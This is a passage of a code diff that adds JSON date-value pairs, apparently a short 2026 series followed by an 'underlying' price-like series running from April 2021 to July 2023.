"2026-03-31", + 42.37827654040538 + ], + [ + "2026-04-01", + 46.50901689467074 + ], + [ + "2026-04-02", + 46.894266010190094 + ], + [ + "2026-04-06", + 48.9735897804959 + ], + [ + "2026-04-07", + 49.028558966470904 + ], + [ + "2026-04-08", + 58.408137238792904 + ], + [ + "2026-04-09", + 60.2535058654175 + ], + [ + "2026-04-10", + 60.65699402505437 + ], + [ + "2026-04-13", + 63.52111101359946 + ], + [ + "2026-04-14", + 67.9744973326308 + ], + [ + "2026-04-15", + 70.97057374958263 + ], + [ + "2026-04-16", + 71.95622611074239 + ], + [ + "2026-04-17", + 74.50130605328323 + ], + [ + "2026-04-20", + 72.75337132221188 + ], + [ + "2026-04-21", + 70.62253154480013 + ], + [ + "2026-04-22", + 74.18999632009644 + ], + [ + "2026-04-23", + 71.01117667153218 + ] + ], + "underlying": [ + [ + "2021-04-01", + 22.899221420288086 + ], + [ + "2021-04-05", + 24.27460289001465 + ], + [ + "2021-04-06", + 24.217294692993164 + ], + [ + "2021-04-07", + 24.396381378173828 + ], + [ + "2021-04-08", + 25.158098220825195 + ], + [ + "2021-04-09", + 25.61417007446289 + ], + [ + "2021-04-12", + 25.51388168334961 + ], + [ + "2021-04-13", + 26.387826919555664 + ], + [ + "2021-04-14", + 25.461355209350586 + ], + [ + "2021-04-15", + 26.58601188659668 + ], + [ + "2021-04-16", + 26.6982421875 + ], + [ + "2021-04-19", + 25.96995735168457 + ], + [ + "2021-04-20", + 25.401655197143555 + ], + [ + "2021-04-21", + 26.04397964477539 + ], + [ + "2021-04-22", + 25.09601593017578 + ], + [ + "2021-04-23", + 26.04159164428711 + ], + [ + "2021-04-26", + 26.55735969543457 + ], + [ + "2021-04-27", + 26.208740234375 + ], + [ + "2021-04-28", + 25.938915252685547 + ], + [ + "2021-04-29", + 26.199188232421875 + ], + [ + "2021-04-30", + 25.707298278808594 + ], + [ + "2021-05-03", + 25.28704261779785 + ], + [ + "2021-05-04", + 23.954633712768555 + ], + [ + "2021-05-05", + 23.675254821777344 + ], + [ + "2021-05-06", + 24.193418502807617 + ], + [ + "2021-05-07", + 24.785598754882812 + ], + [ + "2021-05-10", + 22.923097610473633 + ], + [ + "2021-05-11", + 22.808475494384766 + ], + [ + "2021-05-12", + 21.072532653808594 + ], + [ + "2021-05-13", + 21.51666831970215 + ], + [ + "2021-05-14", + 22.915931701660156 + ], + [ + "2021-05-17", + 22.52910804748535 + ], + [ + "2021-05-18", + 22.056318283081055 + ], + [ + "2021-05-19", + 22.137502670288086 + ], + [ + "2021-05-20", + 23.417375564575195 + ], + [ + "2021-05-21", + 23.030548095703125 + ], + [ + "2021-05-24", + 24.183866500854492 + ], + [ + "2021-05-25", + 24.300867080688477 + ], + [ + "2021-05-26", + 24.54681396484375 + ], + [ + "2021-05-27", + 24.26027488708496 + ], + [ + "2021-05-28", + 24.496671676635742 + ], + [ + "2021-06-01", + 24.257888793945312 + ], + [ + "2021-06-02", + 24.38444709777832 + ], + [ + "2021-06-03", + 23.61795425415039 + ], + [ + "2021-06-04", + 24.828577041625977 + ], + [ + "2021-06-07", + 25.04825782775879 + ], + [ + "2021-06-08", + 25.0769100189209 + ], + [ + "2021-06-09", + 25.105566024780273 + ], + [ + "2021-06-10", + 25.87444496154785 + ], + [ + "2021-06-11", + 26.079795837402344 + ], + [ + "2021-06-14", + 26.810470581054688 + ], + [ + "2021-06-15", + 26.31380271911621 + ], + [ + "2021-06-16", + 26.032039642333984 + ], + [ + "2021-06-17", + 27.00388526916504 + ], + [ + "2021-06-18", + 26.359174728393555 + ], + [ + "2021-06-21", + 26.841514587402344 + ], + [ + "2021-06-22", + 27.591291427612305 + ], + [ + "2021-06-23", + 27.6390438079834 + ], + [ + "2021-06-24", + 28.147655487060547 + ], + [ + "2021-06-25", + 28.059303283691406 + ], + [ + "2021-06-28", + 29.052637100219727 + ], + [ + "2021-06-29", + 29.37976837158203 + ], + [ + "2021-06-30", + 29.250825881958008 + ], + [ + "2021-07-01", + 29.265153884887695 + ], + [ + "2021-07-02", + 30.258485794067383 + ], + [ + "2021-07-06", + 30.664413452148438 + ], + [ + "2021-07-07", + 30.86021614074707 + ], + [ + "2021-07-08", + 30.32534408569336 + ], + [ + "2021-07-09", + 30.83872413635254 + ], + [ + "2021-07-12", + 31.225555419921875 + ], + [ + "2021-07-13", + 31.208845138549805 + ], + [ + "2021-07-14", + 31.378379821777344 + ], + [ + "2021-07-15", + 30.7288875579834 + ], + [ + "2021-07-16", + 29.974334716796875 + ], + [ + "2021-07-19", + 29.25560188293457 + ], + [ + "2021-07-20", + 30.220279693603516 + ], + [ + "2021-07-21", + 30.910362243652344 + ], + [ + "2021-07-22", + 31.559852600097656 + ], + [ + "2021-07-23", + 32.60811233520508 + ], + [ + "2021-07-26", + 32.74422073364258 + ], + [ + "2021-07-27", + 31.67445945739746 + ], + [ + "2021-07-28", + 32.02069854736328 + ], + [ + "2021-07-29", + 32.17829513549805 + ], + [ + "2021-07-30", + 31.695960998535156 + ], + [ + "2021-08-02", + 31.6864070892334 + ], + [ + "2021-08-03", + 32.23799133300781 + ], + [ + "2021-08-04", + 32.39796829223633 + ], + [ + "2021-08-05", + 33.00687026977539 + ], + [ + "2021-08-06", + 32.577056884765625 + ], + [ + "2021-08-09", + 32.75137710571289 + ], + [ + "2021-08-10", + 32.261863708496094 + ], + [ + "2021-08-11", + 32.087554931640625 + ], + [ + "2021-08-12", + 32.42185592651367 + ], + [ + "2021-08-13", + 32.74660110473633 + ], + [ + "2021-08-16", + 32.80390167236328 + ], + [ + "2021-08-17", + 31.941905975341797 + ], + [ + "2021-08-18", + 31.013044357299805 + ], + [ + "2021-08-19", + 31.454792022705078 + ], + [ + "2021-08-20", + 32.42662811279297 + ], + [ + "2021-08-23", + 33.87126922607422 + ], + [ + "2021-08-24", + 34.205562591552734 + ], + [ + "2021-08-25", + 34.2437629699707 + ], + [ + "2021-08-26", + 33.66352462768555 + ], + [ + "2021-08-27", + 34.64730453491211 + ], + [ + "2021-08-30", + 35.79584884643555 + ], + [ + "2021-08-31", + 35.695556640625 + ], + [ + "2021-09-01", + 35.891357421875 + ], + [ + "2021-09-02", + 35.841224670410156 + ], + [ + "2021-09-03", + 36.16357421875 + ], + [ + "2021-09-07", + 36.311614990234375 + ], + [ + "2021-09-08", + 35.939125061035156 + ], + [ + "2021-09-09", + 35.5546760559082 + ], + [ + "2021-09-10", + 34.754756927490234 + ], + [ + "2021-09-13", + 34.67596435546875 + ], + [ + "2021-09-14", + 34.37747573852539 + ], + [ + "2021-09-15", + 35.139190673828125 + ], + [ + "2021-09-16", + 35.20845031738281 + ], + [ + "2021-09-17", + 33.964385986328125 + ], + [ + "2021-09-20", + 31.875049591064453 + ], + [ + "2021-09-21", + 31.915630340576172 + ], + [ + "2021-09-22", + 32.849273681640625 + ], + [ + "2021-09-23", + 33.761417388916016 + ], + [ + "2021-09-24", + 33.85693359375 + ], + [ + "2021-09-27", + 33.04030227661133 + ], + [ + "2021-09-28", + 30.28475570678711 + ], + [ + "2021-09-29", + 30.084177017211914 + ], + [ + "2021-09-30", + 29.74510383605957 + ], + [ + "2021-10-01", + 30.287139892578125 + ], + [ + "2021-10-04", + 28.424640655517578 + ], + [ + "2021-10-05", + 29.518260955810547 + ], + [ + "2021-10-06", + 30.100893020629883 + ], + [ + "2021-10-07", + 30.91514015197754 + ], + [ + "2021-10-08", + 30.439964294433594 + ], + [ + "2021-10-11", + 29.76420783996582 + ], + [ + "2021-10-12", + 29.460954666137695 + ], + [ + "2021-10-13", + 30.151033401489258 + ], + [ + "2021-10-14", + 31.815345764160156 + ], + [ + "2021-10-15", + 32.4051399230957 + ], + [ + "2021-10-18", + 33.376983642578125 + ], + [ + "2021-10-19", + 34.110050201416016 + ], + [ + "2021-10-20", + 34.002586364746094 + ], + [ + "2021-10-21", + 34.61148452758789 + ], + [ + "2021-10-22", + 33.73516082763672 + ], + [ + "2021-10-25", + 34.747589111328125 + ], + [ + "2021-10-26", + 35.07233810424805 + ], + [ + "2021-10-27", + 35.34932327270508 + ], + [ + "2021-10-28", + 36.50980758666992 + ], + [ + "2021-10-29", + 37.04945373535156 + ], + [ + "2021-11-01", + 37.414791107177734 + ], + [ + "2021-11-02", + 37.913848876953125 + ], + [ + "2021-11-03", + 39.117305755615234 + ], + [ + "2021-11-04", + 40.57626724243164 + ], + [ + "2021-11-05", + 40.7266960144043 + ], + [ + "2021-11-08", + 40.55955505371094 + ], + [ + "2021-11-09", + 39.72381591796875 + ], + [ + "2021-11-10", + 37.983097076416016 + ], + [ + "2021-11-11", + 38.291114807128906 + ], + [ + "2021-11-12", + 39.50652313232422 + ], + [ + "2021-11-15", + 39.49457931518555 + ], + [ + "2021-11-16", + 40.311222076416016 + ], + [ + "2021-11-17", + 40.35897445678711 + ], + [ + "2021-11-18", + 41.593482971191406 + ], + [ + "2021-11-19", + 42.29789733886719 + ], + [ + "2021-11-22", + 40.831764221191406 + ], + [ + "2021-11-23", + 40.27539825439453 + ], + [ + "2021-11-24", + 40.64789962768555 + ], + [ + "2021-11-26", + 38.40573501586914 + ], + [ + "2021-11-29", + 40.79117202758789 + ], + [ + "2021-11-30", + 39.03851318359375 + ], + [ + "2021-12-01", + 37.035125732421875 + ], + [ + "2021-12-02", + 37.73237228393555 + ], + [ + "2021-12-03", + 35.83644485473633 + ], + [ + "2021-12-06", + 36.674564361572266 + ], + [ + "2021-12-07", + 39.9817008972168 + ], + [ + "2021-12-08", + 40.538063049316406 + ], + [ + "2021-12-09", + 38.787784576416016 + ], + [ + "2021-12-10", + 39.988861083984375 + ], + [ + "2021-12-13", + 38.2696418762207 + ], + [ + "2021-12-14", + 37.130638122558594 + ], + [ + "2021-12-15", + 39.587703704833984 + ], + [ + "2021-12-16", + 36.567115783691406 + ], + [ + "2021-12-17", + 36.008365631103516 + ], + [ + "2021-12-20", + 34.93145751953125 + ], + [ + "2021-12-21", + 37.266746520996094 + ], + [ + "2021-12-22", + 38.596763610839844 + ], + [ + "2021-12-23", + 39.5136833190918 + ], + [ + "2021-12-27", + 41.40245819091797 + ], + [ + "2021-12-28", + 40.915340423583984 + ], + [ + "2021-12-29", + 40.850868225097656 + ], + [ + "2021-12-30", + 40.468814849853516 + ], + [ + "2021-12-31", + 39.716651916503906 + ], + [ + "2022-01-03", + 40.862815856933594 + ], + [ + "2022-01-04", + 39.27490234375 + ], + [ + "2022-01-05", + 35.662132263183594 + ], + [ + "2022-01-06", + 35.564231872558594 + ], + [ + "2022-01-07", + 34.40135955810547 + ], + [ + "2022-01-10", + 34.52790832519531 + ], + [ + "2022-01-11", + 36.04656219482422 + ], + [ + "2022-01-12", + 36.457279205322266 + ], + [ + "2022-01-13", + 33.81156921386719 + ], + [ + "2022-01-14", + 34.32255935668945 + ], + [ + "2022-01-18", + 31.84877586364746 + ], + [ + "2022-01-19", + 30.740827560424805 + ], + [ + "2022-01-20", + 29.551692962646484 + ], + [ + "2022-01-21", + 27.06357765197754 + ], + [ + "2022-01-24", + 27.455184936523438 + ], + [ + "2022-01-25", + 25.43031120300293 + ], + [ + "2022-01-26", + 25.382553100585938 + ], + [ + "2022-01-27", + 24.623226165771484 + ], + [ + "2022-01-28", + 26.920307159423828 + ], + [ + "2022-01-31", + 29.527812957763672 + ], + [ + "2022-02-01", + 30.091337203979492 + ], + [ + "2022-02-02", + 30.80290985107422 + ], + [ + "2022-02-03", + 27.09700584411621 + ], + [ + "2022-02-04", + 28.033035278320312 + ], + [ + "2022-02-07", + 27.397871017456055 + ], + [ + "2022-02-08", + 28.329120635986328 + ], + [ + "2022-02-09", + 30.086559295654297 + ], + [ + "2022-02-10", + 28.090341567993164 + ], + [ + "2022-02-11", + 25.44463348388672 + ], + [ + "2022-02-14", + 25.516267776489258 + ], + [ + "2022-02-15", + 27.364442825317383 + ], + [ + "2022-02-16", + 27.359668731689453 + ], + [ + "2022-02-17", + 24.93364143371582 + ], + [ + "2022-02-18", + 24.08835220336914 + ], + [ + "2022-02-22", + 23.343353271484375 + ], + [ + "2022-02-23", + 21.557260513305664 + ], + [ + "2022-02-24", + 23.6680965423584 + ], + [ + "2022-02-25", + 24.790374755859375 + ], + [ + "2022-02-28", + 25.05303382873535 + ], + [ + "2022-03-01", + 23.897327423095703 + ], + [ + "2022-03-02", + 25.03870391845703 + ], + [ + "2022-03-03", + 23.992839813232422 + ], + [ + "2022-03-04", + 22.966079711914062 + ], + [ + "2022-03-07", + 20.40155601501465 + ], + [ + "2022-03-08", + 20.119794845581055 + ], + [ + "2022-03-09", + 22.273611068725586 + ], + [ + "2022-03-10", + 21.557260513305664 + ], + [ + "2022-03-11", + 20.22007942199707 + ], + [ + "2022-03-14", + 19.035724639892578 + ], + [ + "2022-03-15", + 20.797929763793945 + ], + [ + "2022-03-16", + 23.133224487304688 + ], + [ + "2022-03-17", + 23.90688133239746 + ], + [ + "2022-03-18", + 25.392101287841797 + ], + [ + "2022-03-21", + 25.21063232421875 + ], + [ + "2022-03-22", + 26.70063018798828 + ], + [ + "2022-03-23", + 25.573577880859375 + ], + [ + "2022-03-24", + 27.230728149414062 + ], + [ + "2022-03-25", + 27.187747955322266 + ], + [ + "2022-03-28", + 28.424640655517578 + ], + [ + "2022-03-29", + 29.881210327148438 + ], + [ + "2022-03-30", + 28.98339080810547 + ], + [ + "2022-03-31", + 27.784700393676758 + ], + [ + "2022-04-01", + 27.66530990600586 + ], + [ + "2022-04-04", + 29.394092559814453 + ], + [ + "2022-04-05", + 27.450407028198242 + ], + [ + "2022-04-06", + 25.64521598815918 + ], + [ + "2022-04-07", + 25.81236457824707 + ], + [ + "2022-04-08", + 24.756940841674805 + ], + [ + "2022-04-11", + 22.99950408935547 + ], + [ + "2022-04-12", + 22.703414916992188 + ], + [ + "2022-04-13", + 24.06447410583496 + ], + [ + "2022-04-14", + 22.445533752441406 + ], + [ + "2022-04-18", + 22.507614135742188 + ], + [ + "2022-04-19", + 23.954633712768555 + ], + [ + "2022-04-20", + 22.875341415405273 + ], + [ + "2022-04-21", + 21.53338623046875 + ], + [ + "2022-04-22", + 19.823701858520508 + ], + [ + "2022-04-25", + 20.559154510498047 + ], + [ + "2022-04-26", + 18.247737884521484 + ], + [ + "2022-04-27", + 18.166549682617188 + ], + [ + "2022-04-28", + 20.086362838745117 + ], + [ + "2022-04-29", + 17.44542694091797 + ], + [ + "2022-05-02", + 18.266843795776367 + ], + [ + "2022-05-03", + 18.30982208251953 + ], + [ + "2022-05-04", + 20.12456512451172 + ], + [ + "2022-05-05", + 17.125457763671875 + ], + [ + "2022-05-06", + 16.528507232666016 + ], + [ + "2022-05-09", + 14.575267791748047 + ], + [ + "2022-05-10", + 15.07671070098877 + ], + [ + "2022-05-11", + 13.73475456237793 + ], + [ + "2022-05-12", + 13.624917030334473 + ], + [ + "2022-05-13", + 15.105364799499512 + ], + [ + "2022-05-16", + 14.637351036071777 + ], + [ + "2022-05-17", + 15.740527153015137 + ], + [ + "2022-05-18", + 13.443440437316895 + ], + [ + "2022-05-19", + 13.171229362487793 + ], + [ + "2022-05-20", + 13.056612014770508 + ], + [ + "2022-05-23", + 13.701324462890625 + ], + [ + "2022-05-24", + 12.846485137939453 + ], + [ + "2022-05-25", + 13.362252235412598 + ], + [ + "2022-05-26", + 14.479756355285645 + ], + [ + "2022-05-27", + 15.898124694824219 + ], + [ + "2022-05-31", + 15.783509254455566 + ], + [ + "2022-06-01", + 15.415780067443848 + ], + [ + "2022-06-02", + 16.667003631591797 + ], + [ + "2022-06-03", + 15.348922729492188 + ], + [ + "2022-06-06", + 15.539949417114258 + ], + [ + "2022-06-07", + 15.917224884033203 + ], + [ + "2022-06-08", + 15.59248161315918 + ], + [ + "2022-06-09", + 14.322158813476562 + ], + [ + "2022-06-10", + 12.793951988220215 + ], + [ + "2022-06-13", + 11.02219009399414 + ], + [ + "2022-06-14", + 11.09382438659668 + ], + [ + "2022-06-15", + 11.891355514526367 + ], + [ + "2022-06-16", + 10.439560890197754 + ], + [ + "2022-06-17", + 10.826384544372559 + ], + [ + "2022-06-21", + 11.643020629882812 + ], + [ + "2022-06-22", + 11.600043296813965 + ], + [ + "2022-06-23", + 12.096709251403809 + ], + [ + "2022-06-24", + 13.362252235412598 + ], + [ + "2022-06-27", + 13.047062873840332 + ], + [ + "2022-06-28", + 11.857924461364746 + ], + [ + "2022-06-29", + 11.881804466247559 + ], + [ + "2022-06-30", + 11.461548805236816 + ], + [ + "2022-07-01", + 11.647796630859375 + ], + [ + "2022-07-05", + 12.249527931213379 + ], + [ + "2022-07-06", + 12.483534812927246 + ], + [ + "2022-07-07", + 13.257190704345703 + ], + [ + "2022-07-08", + 13.3192720413208 + ], + [ + "2022-07-11", + 12.469209671020508 + ], + [ + "2022-07-12", + 12.106260299682617 + ], + [ + "2022-07-13", + 12.029850006103516 + ], + [ + "2022-07-14", + 12.15401554107666 + ], + [ + "2022-07-15", + 12.793951988220215 + ], + [ + "2022-07-18", + 12.497861862182617 + ], + [ + "2022-07-19", + 13.591484069824219 + ], + [ + "2022-07-20", + 14.27440357208252 + ], + [ + "2022-07-21", + 14.88090991973877 + ], + [ + "2022-07-22", + 14.102479934692383 + ], + [ + "2022-07-25", + 13.892350196838379 + ], + [ + "2022-07-26", + 13.051836967468262 + ], + [ + "2022-07-27", + 14.680333137512207 + ], + [ + "2022-07-28", + 15.100590705871582 + ], + [ + "2022-07-29", + 15.931553840637207 + ], + [ + "2022-08-01", + 15.907672882080078 + ], + [ + "2022-08-02", + 15.759629249572754 + ], + [ + "2022-08-03", + 17.020397186279297 + ], + [ + "2022-08-04", + 17.263954162597656 + ], + [ + "2022-08-05", + 16.85325050354004 + ], + [ + "2022-08-08", + 16.68132972717285 + ], + [ + "2022-08-09", + 16.108245849609375 + ], + [ + "2022-08-10", + 17.43110466003418 + ], + [ + "2022-08-11", + 17.168445587158203 + ], + [ + "2022-08-12", + 18.137897491455078 + ], + [ + "2022-08-15", + 18.572481155395508 + ], + [ + "2022-08-16", + 18.45309066772461 + ], + [ + "2022-08-17", + 17.813152313232422 + ], + [ + "2022-08-18", + 17.932546615600586 + ], + [ + "2022-08-19", + 16.88190269470215 + ], + [ + "2022-08-22", + 15.554277420043945 + ], + [ + "2022-08-23", + 15.501744270324707 + ], + [ + "2022-08-24", + 15.621135711669922 + ], + [ + "2022-08-25", + 16.442546844482422 + ], + [ + "2022-08-26", + 14.441550254821777 + ], + [ + "2022-08-29", + 13.99741268157959 + ], + [ + "2022-08-30", + 13.529401779174805 + ], + [ + "2022-08-31", + 13.2810697555542 + ], + [ + "2022-09-01", + 13.295394897460938 + ], + [ + "2022-09-02", + 12.741419792175293 + ], + [ + "2022-09-06", + 12.450104713439941 + ], + [ + "2022-09-07", + 13.18555736541748 + ], + [ + "2022-09-08", + 13.400458335876465 + ], + [ + "2022-09-09", + 14.25052547454834 + ], + [ + "2022-09-12", + 14.771071434020996 + ], + [ + "2022-09-13", + 12.340266227722168 + ], + [ + "2022-09-14", + 12.617254257202148 + ], + [ + "2022-09-15", + 11.982091903686523 + ], + [ + "2022-09-16", + 11.748085975646973 + ], + [ + "2022-09-19", + 12.029850006103516 + ], + [ + "2022-09-20", + 11.74331283569336 + ], + [ + "2022-09-21", + 11.09859848022461 + ], + [ + "2022-09-22", + 10.68789291381836 + ], + [ + "2022-09-23", + 10.176898002624512 + ], + [ + "2022-09-26", + 10.038407325744629 + ], + [ + "2022-09-27", + 10.047958374023438 + ], + [ + "2022-09-28", + 10.635360717773438 + ], + [ + "2022-09-29", + 9.737539291381836 + ], + [ + "2022-09-30", + 9.226545333862305 + ], + [ + "2022-10-03", + 9.866482734680176 + ], + [ + "2022-10-04", + 10.783406257629395 + ], + [ + "2022-10-05", + 10.783406257629395 + ], + [ + "2022-10-06", + 10.511194229125977 + ], + [ + "2022-10-07", + 9.312505722045898 + ], + [ + "2022-10-10", + 9.021193504333496 + ], + [ + "2022-10-11", + 8.663020133972168 + ], + [ + "2022-10-12", + 8.64391803741455 + ], + [ + "2022-10-13", + 9.221770286560059 + ], + [ + "2022-10-14", + 8.39080810546875 + ], + [ + "2022-10-17", + 9.21699333190918 + ], + [ + "2022-10-18", + 9.44622802734375 + ], + [ + "2022-10-19", + 9.331609725952148 + ], + [ + "2022-10-20", + 9.1740140914917 + ], + [ + "2022-10-21", + 9.823502540588379 + ], + [ + "2022-10-24", + 10.157796859741211 + ], + [ + "2022-10-25", + 10.76908016204834 + ], + [ + "2022-10-26", + 10.05750846862793 + ], + [ + "2022-10-27", + 9.503531455993652 + ], + [ + "2022-10-28", + 10.363150596618652 + ], + [ + "2022-10-31", + 10.004976272583008 + ], + [ + "2022-11-01", + 9.694561004638672 + ], + [ + "2022-11-02", + 8.691675186157227 + ], + [ + "2022-11-03", + 8.190231323242188 + ], + [ + "2022-11-04", + 8.572281837463379 + ], + [ + "2022-11-07", + 8.84449577331543 + ], + [ + "2022-11-08", + 9.03551959991455 + ], + [ + "2022-11-09", + 8.405135154724121 + ], + [ + "2022-11-10", + 10.243757247924805 + ], + [ + "2022-11-11", + 10.826384544372559 + ], + [ + "2022-11-14", + 10.539847373962402 + ], + [ + "2022-11-15", + 10.964879989624023 + ], + [ + "2022-11-16", + 10.520746231079102 + ], + [ + "2022-11-17", + 10.439560890197754 + ], + [ + "2022-11-18", + 10.430008888244629 + ], + [ + "2022-11-21", + 10.114814758300781 + ], + [ + "2022-11-22", + 10.539847373962402 + ], + [ + "2022-11-23", + 10.855043411254883 + ], + [ + "2022-11-25", + 10.630587577819824 + ], + [ + "2022-11-28", + 10.16257095336914 + ], + [ + "2022-11-29", + 9.919014930725098 + ], + [ + "2022-11-30", + 11.251418113708496 + ], + [ + "2022-12-01", + 11.31350326538086 + ], + [ + "2022-12-02", + 11.17978572845459 + ], + [ + "2022-12-05", + 10.616260528564453 + ], + [ + "2022-12-06", + 9.942892074584961 + ], + [ + "2022-12-07", + 9.823502540588379 + ], + [ + "2022-12-08", + 10.172123908996582 + ], + [ + "2022-12-09", + 9.976322174072266 + ], + [ + "2022-12-12", + 10.339269638061523 + ], + [ + "2022-12-13", + 10.664016723632812 + ], + [ + "2022-12-14", + 10.410904884338379 + ], + [ + "2022-12-15", + 9.379364967346191 + ], + [ + "2022-12-16", + 9.102380752563477 + ], + [ + "2022-12-19", + 8.725103378295898 + ], + [ + "2022-12-20", + 8.686897277832031 + ], + [ + "2022-12-21", + 9.064173698425293 + ], + [ + "2022-12-22", + 8.419958114624023 + ], + [ + "2022-12-23", + 8.443960189819336 + ], + [ + "2022-12-27", + 8.083925247192383 + ], + [ + "2022-12-28", + 7.7574968338012695 + ], + [ + "2022-12-29", + 8.3047456741333 + ], + [ + "2022-12-30", + 8.3047456741333 + ], + [ + "2023-01-03", + 8.117527961730957 + ], + [ + "2023-01-04", + 8.242341041564941 + ], + [ + "2023-01-05", + 7.853504657745361 + ], + [ + "2023-01-06", + 8.467960357666016 + ], + [ + "2023-01-09", + 8.645577430725098 + ], + [ + "2023-01-10", + 8.875999450683594 + ], + [ + "2023-01-11", + 9.317636489868164 + ], + [ + "2023-01-12", + 9.461647987365723 + ], + [ + "2023-01-13", + 9.648868560791016 + ], + [ + "2023-01-17", + 9.70167064666748 + ], + [ + "2023-01-18", + 9.341638565063477 + ], + [ + "2023-01-19", + 9.048813819885254 + ], + [ + "2023-01-20", + 9.788078308105469 + ], + [ + "2023-01-23", + 10.43133544921875 + ], + [ + "2023-01-24", + 10.36893081665039 + ], + [ + "2023-01-25", + 10.29212474822998 + ], + [ + "2023-01-26", + 10.887377738952637 + ], + [ + "2023-01-27", + 11.199405670166016 + ], + [ + "2023-01-30", + 10.527344703674316 + ], + [ + "2023-01-31", + 10.997788429260254 + ], + [ + "2023-02-01", + 11.708251953125 + ], + [ + "2023-02-02", + 12.91795825958252 + ], + [ + "2023-02-03", + 12.250700950622559 + ], + [ + "2023-02-06", + 11.938671112060547 + ], + [ + "2023-02-07", + 12.677938461303711 + ], + [ + "2023-02-08", + 11.996277809143066 + ], + [ + "2023-02-09", + 11.674649238586426 + ], + [ + "2023-02-10", + 11.434627532958984 + ], + [ + "2023-02-13", + 11.97707748413086 + ], + [ + "2023-02-14", + 12.236299514770508 + ], + [ + "2023-02-15", + 12.509922981262207 + ], + [ + "2023-02-16", + 11.794658660888672 + ], + [ + "2023-02-17", + 11.540237426757812 + ], + [ + "2023-02-21", + 10.728962898254395 + ], + [ + "2023-02-22", + 10.738566398620605 + ], + [ + "2023-02-23", + 11.0073881149292 + ], + [ + "2023-02-24", + 10.450539588928223 + ], + [ + "2023-02-27", + 10.676156997680664 + ], + [ + "2023-02-28", + 10.623353958129883 + ], + [ + "2023-03-01", + 10.364130973815918 + ], + [ + "2023-03-02", + 10.613754272460938 + ], + [ + "2023-03-03", + 11.261810302734375 + ], + [ + "2023-03-06", + 11.309815406799316 + ], + [ + "2023-03-07", + 10.887377738952637 + ], + [ + "2023-03-08", + 11.0361909866333 + ], + [ + "2023-03-09", + 10.455339431762695 + ], + [ + "2023-03-10", + 10.023299217224121 + ], + [ + "2023-03-13", + 10.23931884765625 + ], + [ + "2023-03-14", + 10.935380935668945 + ], + [ + "2023-03-15", + 11.09379768371582 + ], + [ + "2023-03-16", + 11.972274780273438 + ], + [ + "2023-03-17", + 11.794658660888672 + ], + [ + "2023-03-20", + 11.919469833374023 + ], + [ + "2023-03-21", + 12.423515319824219 + ], + [ + "2023-03-22", + 11.916531562805176 + ], + [ + "2023-03-23", + 12.34143352508545 + ], + [ + "2023-03-24", + 12.466970443725586 + ], + [ + "2023-03-27", + 12.211066246032715 + ], + [ + "2023-03-28", + 12.008270263671875 + ], + [ + "2023-03-29", + 12.664935111999512 + ], + [ + "2023-03-30", + 13.007752418518066 + ], + [ + "2023-03-31", + 13.645103454589844 + ], + [ + "2023-04-03", + 13.54853630065918 + ], + [ + "2023-04-04", + 13.413341522216797 + ], + [ + "2023-04-05", + 12.983611106872559 + ], + [ + "2023-04-06", + 13.244346618652344 + ], + [ + "2023-04-10", + 13.215376853942871 + ], + [ + "2023-04-11", + 12.959467887878418 + ], + [ + "2023-04-12", + 12.616652488708496 + ], + [ + "2023-04-13", + 13.340914726257324 + ], + [ + "2023-04-14", + 13.263659477233887 + ], + [ + "2023-04-17", + 13.278143882751465 + ], + [ + "2023-04-18", + 13.287802696228027 + ], + [ + "2023-04-19", + 13.258830070495605 + ], + [ + "2023-04-20", + 12.949812889099121 + ], + [ + "2023-04-21", + 12.973956108093262 + ], + [ + "2023-04-24", + 12.896700859069824 + ], + [ + "2023-04-25", + 12.167610168457031 + ], + [ + "2023-04-26", + 12.370403289794922 + ], + [ + "2023-04-27", + 13.369884490966797 + ], + [ + "2023-04-28", + 13.640275955200195 + ], + [ + "2023-05-01", + 13.601648330688477 + ], + [ + "2023-05-02", + 13.239518165588379 + ], + [ + "2023-05-03", + 12.978781700134277 + ], + [ + "2023-05-04", + 12.833930969238281 + ], + [ + "2023-05-05", + 13.62096118927002 + ], + [ + "2023-05-08", + 13.732016563415527 + ], + [ + "2023-05-09", + 13.466455459594727 + ], + [ + "2023-05-10", + 13.901010513305664 + ], + [ + "2023-05-11", + 14.01689338684082 + ], + [ + "2023-05-12", + 13.872042655944824 + ], + [ + "2023-05-15", + 14.084491729736328 + ], + [ + "2023-05-16", + 14.137603759765625 + ], + [ + "2023-05-17", + 14.644586563110352 + ], + [ + "2023-05-18", + 15.431618690490723 + ], + [ + "2023-05-19", + 15.32539176940918 + ], + [ + "2023-05-22", + 15.484731674194336 + ], + [ + "2023-05-23", + 14.886006355285645 + ], + [ + "2023-05-24", + 14.644586563110352 + ], + [ + "2023-05-25", + 15.702011108398438 + ], + [ + "2023-05-26", + 16.889801025390625 + ], + [ + "2023-05-30", + 17.12639617919922 + ], + [ + "2023-05-31", + 16.77874755859375 + ], + [ + "2023-06-01", + 17.38712501525879 + ], + [ + "2023-06-02", + 17.778228759765625 + ], + [ + "2023-06-05", + 17.816852569580078 + ], + [ + "2023-06-06", + 17.79754638671875 + ], + [ + "2023-06-07", + 16.889801025390625 + ], + [ + "2023-06-08", + 17.46921157836914 + ], + [ + "2023-06-09", + 17.681659698486328 + ], + [ + "2023-06-12", + 18.58457374572754 + ], + [ + "2023-06-13", + 18.99982261657715 + ], + [ + "2023-06-14", + 19.40540313720703 + ], + [ + "2023-06-15", + 20.086214065551758 + ], + [ + "2023-06-16", + 19.699935913085938 + ], + [ + "2023-06-20", + 19.603368759155273 + ], + [ + "2023-06-21", + 18.817724227905273 + ], + [ + "2023-06-22", + 19.44256019592285 + ], + [ + "2023-06-23", + 18.86616325378418 + ], + [ + "2023-06-26", + 18.12023162841797 + ], + [ + "2023-06-27", + 19.01631736755371 + ], + [ + "2023-06-28", + 19.132564544677734 + ], + [ + "2023-06-29", + 19.001787185668945 + ], + [ + "2023-06-30", + 19.85911750793457 + ], + [ + "2023-07-03", + 19.994741439819336 + ], + [ + "2023-07-05", + 19.980213165283203 + ], + [ + "2023-07-06", + 19.510372161865234 + ], + [ + "2023-07-07", + 19.31178092956543 + ], + [ + "2023-07-10", + 19.326311111450195 + ], + [ + "2023-07-11", + 19.60240364074707 + ], + [ + "2023-07-12", + 20.328954696655273 + ], + [ + "2023-07-13", + 21.341285705566406 + ], + [ + "2023-07-14", + 21.321910858154297 + ], + [ + "2023-07-17", + 21.912839889526367 + ], + [ + "2023-07-18", + 22.435958862304688 + ], + [ + "2023-07-19", + 22.435958862304688 + ], + [ + "2023-07-20", + 20.86176109313965 + ], + [ + "2023-07-21", + 20.677701950073242 + ], + [ + "2023-07-24", + 20.760040283203125 + ], + [ + "2023-07-25", + 21.176603317260742 + ], + [ + "2023-07-26", + 20.958633422851562 + 